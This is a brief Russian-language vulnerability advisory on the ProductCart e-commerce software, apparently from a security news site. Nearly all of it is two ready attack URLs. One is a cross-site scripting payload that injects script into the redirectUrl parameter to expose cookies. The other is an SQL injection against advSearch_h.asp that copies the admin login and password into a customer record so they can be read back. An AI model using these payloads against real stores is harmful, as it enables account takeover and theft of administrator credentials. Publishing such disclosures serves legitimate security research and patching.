Программа: ProductCart 

Несколько уязвимостей обнаружено в ProductCart. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. 

1. XSS: 

http://[target]/productcart/pc/Custva.asp?redirectUrl=">
<script>alert(document.c ookie)</script><"

2. SQL инъекция: 

http://www.shop.com/productcart/pc/advSearch_h.asp?
idcategory=0&idSupplier=10&customfield=0&priceUntil=999;
update%20customers%20set%20name=
(select%20top%201%20idadmin%20from%20admins),  lastName=(select%20top%01%20adminpassword%20from%20admins),
phone=(select%20password%20from%20customers%20where%20 zip=987654)
%20where%20zip=987654;s--elect%20*%20from%20products%20 where%201=1&Submit.y=13&priceFrom=0
&sku=&keyWord=dark&IDBrand=0 &resultCnt=200&Submit.x=33&

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии